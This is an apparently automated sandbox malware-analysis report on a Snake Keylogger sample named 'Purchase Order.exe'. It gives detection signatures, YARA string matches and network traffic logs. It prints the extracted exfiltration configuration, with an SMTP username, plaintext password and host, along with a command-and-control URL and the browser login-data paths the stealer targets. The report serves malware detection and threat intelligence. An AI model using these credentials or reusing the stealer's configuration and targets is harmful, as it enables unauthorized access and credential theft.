Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name:	Purchase Order.exe
Analysis ID:	1420090
MD5:	7eb1409fed2a2b740122f997a76f7a94
SHA1:	8cc9e2d414bc1c8964b965989fb6648857ae9892
SHA256:	ff2ae4fd71daa1a98edd5f88b743a5daa5fb29f70b87dee08fec25313a3640f1
Tags:	exeSnakeKeylogger
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Purchase Order.exe (PID: 1480 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 7EB1409FED2A2B740122F997A76F7A94)

Purchase Order.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 7EB1409FED2A2B740122F997A76F7A94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4454181362.00000000030C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14782:$a1: get_encryptedPassword 0x14a78:$a2: get_encryptedUsername 0x1458e:$a3: get_timePasswordChanged 0x14689:$a4: get_passwordField 0x14798:$a5: set_encryptedPassword 0x15d9b:$a7: get_logins 0x15cfe:$a10: KeyLoggerEventArgs 0x15997:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x180c0:$x1: $%SMTPDV$ 0x18124:$x2: $#TheHashHere%& 0x1975f:$x3: %FTPDV$ 0x19853:$x4: $%TelegramDv$ 0x15997:$x5: KeyLoggerEventArgs 0x15cfe:$x5: KeyLoggerEventArgs 0x19783:$m2: Clipboard Logs ID 0x1994f:$m2: Screenshot Logs ID 0x19a1b:$m2: keystroke Logs ID 0x19927:$m4: \SnakeKeylogger\
00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe1e1a:$a1: get_encryptedPassword 0x10263a:$a1: get_encryptedPassword 0x122c5a:$a1: get_encryptedPassword 0xe2110:$a2: get_encryptedUsername 0x102930:$a2: get_encryptedUsername 0x122f50:$a2: get_encryptedUsername 0xe1c26:$a3: get_timePasswordChanged 0x102446:$a3: get_timePasswordChanged 0x122a66:$a3: get_timePasswordChanged 0xe1d21:$a4: get_passwordField 0x102541:$a4: get_passwordField 0x122b61:$a4: get_passwordField 0xe1e30:$a5: set_encryptedPassword 0x102650:$a5: set_encryptedPassword 0x122c70:$a5: set_encryptedPassword 0xe3433:$a7: get_logins 0x103c53:$a7: get_logins 0x124273:$a7: get_logins 0xe3396:$a10: KeyLoggerEventArgs 0x103bb6:$a10: KeyLoggerEventArgs 0x1241d6:$a10: KeyLoggerEventArgs
00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xe5758:$x1: $%SMTPDV$ 0x105f78:$x1: $%SMTPDV$ 0x126598:$x1: $%SMTPDV$ 0xe57bc:$x2: $#TheHashHere%& 0x105fdc:$x2: $#TheHashHere%& 0x1265fc:$x2: $#TheHashHere%& 0xe6df7:$x3: %FTPDV$ 0x107617:$x3: %FTPDV$ 0x127c37:$x3: %FTPDV$ 0xe6eeb:$x4: $%TelegramDv$ 0x10770b:$x4: $%TelegramDv$ 0x127d2b:$x4: $%TelegramDv$ 0xe302f:$x5: KeyLoggerEventArgs 0xe3396:$x5: KeyLoggerEventArgs 0x10384f:$x5: KeyLoggerEventArgs 0x103bb6:$x5: KeyLoggerEventArgs 0x123e6f:$x5: KeyLoggerEventArgs 0x1241d6:$x5: KeyLoggerEventArgs 0xe6e1b:$m2: Clipboard Logs ID 0xe6fe7:$m2: Screenshot Logs ID 0xe70b3:$m2: keystroke Logs ID
00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 1480	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order.exe PID: 1480	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Purchase Order.exe PID: 1480	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 1480	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c296:$a1: get_encryptedPassword 0x1c582:$a2: get_encryptedUsername 0x1c0ac:$a3: get_timePasswordChanged 0x1c1a7:$a4: get_passwordField 0x1c2ac:$a5: set_encryptedPassword 0x1e7f4:$a7: get_logins 0x1e757:$a10: KeyLoggerEventArgs 0x1e3f0:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Purchase Order.exe PID: 1480	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1e3f0:$x5: KeyLoggerEventArgs 0x1e757:$x5: KeyLoggerEventArgs 0x1f045:$x5: KeyLoggerEventArgs 0x1f379:$x5: KeyLoggerEventArgs 0x20979:$m2: Clipboard Logs ID 0x20a59:$m2: Screenshot Logs ID 0x20a8d:$m2: keystroke Logs ID 0x20a45:$m4: \SnakeKeylogger\
Process Memory Space: Purchase Order.exe PID: 6336	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order.exe PID: 6336	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 6336	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x502f1:$a1: get_encryptedPassword 0x505dd:$a2: get_encryptedUsername 0x50107:$a3: get_timePasswordChanged 0x50202:$a4: get_passwordField 0x50307:$a5: set_encryptedPassword 0x5284f:$a7: get_logins 0x527b2:$a10: KeyLoggerEventArgs 0x5244b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Purchase Order.exe PID: 6336	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5244b:$x5: KeyLoggerEventArgs 0x527b2:$x5: KeyLoggerEventArgs 0x530a0:$x5: KeyLoggerEventArgs 0x533d4:$x5: KeyLoggerEventArgs 0x549d4:$m2: Clipboard Logs ID 0x54ab4:$m2: Screenshot Logs ID 0x54ae8:$m2: keystroke Logs ID 0x54aa0:$m4: \SnakeKeylogger\
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order.exe.399bcb8.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.Purchase Order.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler
0.2.Purchase Order.exe.399bcb8.9.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.Purchase Order.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b900:$a4: \Orbitum\User Data\Default\Login Data 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
0.2.Purchase Order.exe.399bcb8.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
3.2.Purchase Order.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x15534:$s2: SetHook 0x1553c:$s3: CallNextHook 0x15549:$s4: _hook
3.2.Purchase Order.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\
0.2.Purchase Order.exe.399bcb8.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
0.2.Purchase Order.exe.399bcb8.9.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
0.2.Purchase Order.exe.399bcb8.9.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
0.2.Purchase Order.exe.397b498.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order.exe.397b498.8.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Purchase Order.exe.397b498.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
0.2.Purchase Order.exe.397b498.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
0.2.Purchase Order.exe.397b498.8.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
0.2.Purchase Order.exe.397b498.8.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
0.2.Purchase Order.exe.397b498.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order.exe.397b498.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order.exe.397b498.8.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Purchase Order.exe.399bcb8.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order.exe.399bcb8.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order.exe.399bcb8.9.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Purchase Order.exe.397b498.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x351a2:$a1: get_encryptedPassword 0x557c2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35498:$a2: get_encryptedUsername 0x55ab8:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34fae:$a3: get_timePasswordChanged 0x555ce:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x350a9:$a4: get_passwordField 0x556c9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x351b8:$a5: set_encryptedPassword 0x557d8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x367bb:$a7: get_logins 0x56ddb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3671e:$a10: KeyLoggerEventArgs 0x56d3e:$a10: KeyLoggerEventArgs
0.2.Purchase Order.exe.399bcb8.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x34fa2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35298:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34dae:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x34ea9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x34fb8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x365bb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3651e:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler 0x361b7:$a11: KeyLoggerEventArgsEventHandler
0.2.Purchase Order.exe.397b498.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35d4d:$s1: UnHook 0x5636d:$s1: UnHook 0x15534:$s2: SetHook 0x35d54:$s2: SetHook 0x56374:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35d5c:$s3: CallNextHook 0x5637c:$s3: CallNextHook 0x15549:$s4: _hook 0x35d69:$s4: _hook 0x56389:$s4: _hook
0.2.Purchase Order.exe.397b498.8.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x38ae0:$x1: $%SMTPDV$ 0x59100:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38b44:$x2: $#TheHashHere%& 0x59164:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x3a17f:$x3: %FTPDV$ 0x5a79f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a273:$x4: $%TelegramDv$ 0x5a893:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x363b7:$x5: KeyLoggerEventArgs 0x3671e:$x5: KeyLoggerEventArgs 0x569d7:$x5: KeyLoggerEventArgs 0x56d3e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID
0.2.Purchase Order.exe.399bcb8.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35b4d:$s1: UnHook 0x15534:$s2: SetHook 0x35b54:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35b5c:$s3: CallNextHook 0x15549:$s4: _hook 0x35b69:$s4: _hook
0.2.Purchase Order.exe.399bcb8.9.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x388e0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38944:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x39f7f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a073:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x361b7:$x5: KeyLoggerEventArgs 0x3651e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x39fa3:$m2: Clipboard Logs ID 0x3a16f:$m2: Screenshot Logs ID 0x3a23b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\ 0x3a147:$m4: \SnakeKeylogger\
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.224, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order.exe, Initiated: true, ProcessId: 6336, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: Purchase Order.exe	ReversingLabs: Detection: 21%
Source: Purchase Order.exe	Virustotal: Detection: 29%			Perma Link

Machine Learning detection for sample

Source: Purchase Order.exe

Joe Sandbox ML: detected

Source: Purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49710 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49724 version: TLS 1.2

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: LkSW.pdb source: Purchase Order.exe
Source:	Binary string: LkSW.pdbSHA256 source: Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 052DEFDDh	3_2_052DEDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 052DF967h	3_2_052DEDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 052DFCD1h	3_2_052DFA10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_052DE310
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_052DE943
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_052DEB23
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B28945h	3_2_06B28608
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B26171h	3_2_06B25EC8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06B236CE
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B258C1h	3_2_06B25618
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B25D19h	3_2_06B25A70
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06B233B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06B233A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B26E79h	3_2_06B26BD0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B265C9h	3_2_06B26320
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B26A21h	3_2_06B26778
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B27751h	3_2_06B274A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B20741h	3_2_06B20498
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B20B99h	3_2_06B208F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B272FAh	3_2_06B27050
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B202E9h	3_2_06B20040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B28459h	3_2_06B281B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B25441h	3_2_06B25198
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B27BA9h	3_2_06B27900
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B28001h	3_2_06B27D58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06B20FF1h	3_2_06B20D48

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.5:49733 -> 208.91.199.224:587

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View	IP Address: 208.91.199.224 208.91.199.224
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.5:49733 -> 208.91.199.224:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
